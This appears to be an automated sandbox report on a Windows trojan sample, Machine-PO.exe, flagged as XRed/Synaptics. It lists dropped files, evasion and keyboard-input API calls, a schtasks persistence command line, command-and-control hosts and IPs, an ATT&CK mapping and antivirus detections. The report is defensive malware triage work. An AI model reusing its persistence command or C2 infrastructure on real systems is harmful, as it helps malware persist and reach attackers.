                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeWindow / User API: threadDelayed 5414Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeWindow / User API: foregroundWindowGot 1618Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_10-103511
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeAPI coverage: 3.7 %
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exe TID: 1756Thread sleep time: -54140s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 1076Thread sleep time: -1560000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7748Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\splwow64.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeThread sleep count: Count: 5414 delay: -10Jump to behavior
                              Source: Yara matchFile source: 00000007.00000002.2753117932.0000000002C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.2754697002.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 756, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, type: DROPPED
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00252044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00252044
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0025219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0025219F
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_002524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_002524A9
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00246B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,10_2_00246B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00246E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,10_2_00246E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0024F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0024F350
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0024FD47 FindFirstFileW,FindClose,10_2_0024FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0021DD92 GetFileAttributesW,FindFirstFileW,FindClose,10_2_0021DD92
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0024FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0024FDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0021E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_0021E47B
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                              Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: Machine-PO.exe, 00000000.00000003.1497644729.00000000007F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: Machine-PO.exe, 00000000.00000003.1497644729.00000000007F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0025703C BlockInput,10_2_0025703C
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0020374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,10_2_0020374E
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_002346D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,10_2_002346D0
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_002620F6 LoadLibraryA,GetProcAddress,10_2_002620F6
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0022A937 GetProcessHeap,10_2_0022A937
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00228E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00228E3C
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00228E19 SetUnhandledExceptionFilter,10_2_00228E19
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0023BE95 LogonUserW,10_2_0023BE95
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0020374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,10_2_0020374E
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00244B52 SendInput,keybd_event,10_2_00244B52
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00247DD5 mouse_event,10_2_00247DD5
                              Source: C:\Users\user\Desktop\Machine-PO.exeProcess created: C:\Users\user\Desktop\._cache_Machine-PO.exe "C:\Users\user\Desktop\._cache_Machine-PO.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0023B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_0023B398
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0023BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_0023BE31
                              Source: TCPKPY.exeBinary or memory string: Shell_TrayWnd
                              Source: Machine-PO.exe, 00000000.00000003.1496148183.0000000005E09000.00000004.00000020.00020000.00000000.sdmp, Machine-PO.exe, 00000000.00000000.1488871651.0000000000566000.00000002.00000001.01000000.00000003.sdmp, ._cache_Machine-PO.exe, 00000002.00000003.1503190646.0000000004391000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00227254 cpuid 10_2_00227254
                              Source: C:\Users\user\Desktop\Machine-PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_002240DA GetSystemTimeAsFileTime,__aulldiv,10_2_002240DA
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0027C146 GetUserNameW,10_2_0027C146
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00232C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_00232C3C
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0021E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_0021E47B
                              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected XRed
                              Source: Yara matchFile source: Machine-PO.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.Machine-PO.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: Machine-PO.exe PID: 5988, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX7868.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: TCPKPY.exe.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                              Source: TCPKPY.exe, 00000019.00000002.2613943563.0000000004E9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                              Source: TCPKPY.exeBinary or memory string: WIN_XP
                              Source: TCPKPY.exeBinary or memory string: WIN_XPe
                              Source: TCPKPY.exeBinary or memory string: WIN_VISTA
                              Source: TCPKPY.exeBinary or memory string: WIN_7
                              Source: TCPKPY.exeBinary or memory string: WIN_8
                              Source: TCPKPY.exe, 00000017.00000002.2017426062.0000000003FEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_819

                              Remote Access Functionality

                              barindex
                              Yara detected XRed
                              Source: Yara matchFile source: Machine-PO.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.Machine-PO.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: Machine-PO.exe PID: 5988, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX7868.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_002591DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_002591DC
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_002596E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_002596E2

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information421
                              Scripting                              		2
                              Valid Accounts                              		11
                              Windows Management Instrumentation                              		421
                              Scripting                              		1
                              Exploitation for Privilege Escalation                              		1
                              Disable or Modify Tools                              		21
                              Input Capture                              		2
                              System Time Discovery                              		Remote Services1
                              Archive Collected Data                              		4
                              Ingress Tool Transfer                              		Exfiltration Over Other Network Medium1
                              System Shutdown/Reboot
                              CredentialsDomains1
                              Replication Through Removable Media                              		2
                              Native API                              		1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory1
                              Peripheral Device Discovery                              		Remote Desktop Protocol21
                              Input Capture                              		11
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job                              		2
                              Valid Accounts                              		1
                              Extra Window Memory Injection                              		2
                              Obfuscated Files or Information                              		Security Account Manager1
                              Account Discovery                              		SMB/Windows Admin Shares3
                              Clipboard Data                              		3
                              Non-Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron1
                              Scheduled Task/Job                              		2
                              Valid Accounts                              		1
                              DLL Side-Loading                              		NTDS4
                              File and Directory Discovery                              		Distributed Component Object ModelInput Capture34
                              Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd21
                              Registry Run Keys / Startup Folder                              		21
                              Access Token Manipulation                              		1
                              Extra Window Memory Injection                              		LSA Secrets38
                              System Information Discovery                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                              Process Injection                              		112
                              Masquerading                              		Cached Domain Credentials1
                              Query Registry                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                              Scheduled Task/Job                              		2
                              Valid Accounts                              		DCSync141
                              Security Software Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job21
                              Registry Run Keys / Startup Folder                              		21
                              Virtualization/Sandbox Evasion                              		Proc Filesystem21
                              Virtualization/Sandbox Evasion                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                              Access Token Manipulation                              		/etc/passwd and /etc/shadow3
                              Process Discovery                              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                              Process Injection                              		Network Sniffing11
                              Application Window Discovery                              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                              System Owner/User Discovery                              		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582336 Sample: Machine-PO.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 53 freedns.afraid.org 2->53 55 xred.mooo.com 2->55 57 4 other IPs or domains 2->57 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Antivirus detection for URL or domain 2->71 75 18 other signatures 2->75 9 Machine-PO.exe 1 6 2->9         started        12 TCPKPY.exe 2->12         started        15 EXCEL.EXE 228 68 2->15         started        17 6 other processes 2->17 signatures3 73 Uses dynamic DNS services 53->73 process4 file5 45 C:\Users\user\...\._cache_Machine-PO.exe, PE32 9->45 dropped 47 C:\ProgramData\Synaptics\Synaptics.exe, PE32 9->47 dropped 49 C:\ProgramData\Synaptics\RCX7868.tmp, PE32 9->49 dropped 51 C:\...\Synaptics.exe:Zone.Identifier, ASCII 9->51 dropped 19 ._cache_Machine-PO.exe 2 5 9->19         started        24 Synaptics.exe 46 9->24         started        85 Antivirus detection for dropped file 12->85 87 Multi AV Scanner detection for dropped file 12->87 89 Machine Learning detection for dropped file 12->89 26 splwow64.exe 15->26         started        signatures6 process7 dnsIp8 59 172.111.138.100, 49729, 49786, 49802 VOXILITYGB United States 19->59 39 C:\Users\user\AppData\Roaming\...\TCPKPY.exe, PE32 19->39 dropped 41 C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, ASCII 19->41 dropped 77 Antivirus detection for dropped file 19->77 79 Multi AV Scanner detection for dropped file 19->79 81 Machine Learning detection for dropped file 19->81 28 cmd.exe 1 19->28         started        31 wscript.exe 19->31         started        61 drive.usercontent.google.com 172.217.16.193, 443, 49716, 49717 GOOGLEUS United States 24->61 63 docs.google.com 216.58.206.46, 443, 49709, 49710 GOOGLEUS United States 24->63 65 freedns.afraid.org 69.42.215.252, 49714, 80 AWKNET-LLCUS United States 24->65 43 C:\Users\user\Documents\PIVFAGEAAV\~$cache1, PE32 24->43 dropped 83 Drops PE files to the document folder of the user 24->83 33 WerFault.exe 24->33         started        file9 signatures10 process11 signatures12 91 Uses schtasks.exe or at.exe to add and modify task schedules 28->91 35 conhost.exe 28->35         started        37 schtasks.exe 28->37         started        93 Windows Scripting host queries suspicious COM object (likely to drop second stage) 31->93 process13

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              Machine-PO.exe86%VirustotalBrowse
                              Machine-PO.exe92%ReversingLabsWin32.Trojan.Synaptics
                              Machine-PO.exe100%AviraTR/Dldr.Agent.SH
                              Machine-PO.exe100%AviraHEUR/AGEN.1353217
                              Machine-PO.exe100%AviraW2000M/Dldr.Agent.17651006
                              Machine-PO.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe100%AviraHEUR/AGEN.1353217
                              C:\Users\user\Desktop\._cache_Machine-PO.exe100%AviraHEUR/AGEN.1353217
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraHEUR/AGEN.1353217
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\Documents\PIVFAGEAAV\~$cache1100%AviraTR/Dldr.Agent.SH
                              C:\Users\user\Documents\PIVFAGEAAV\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\RCX7868.tmp100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\RCX7868.tmp100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\AppData\Local\Temp\UAINOJ.vbs100%AviraVBS/Runner.VPJI
                              C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\._cache_Machine-PO.exe100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                              C:\Users\user\Documents\PIVFAGEAAV\~$cache1100%Joe Sandbox ML
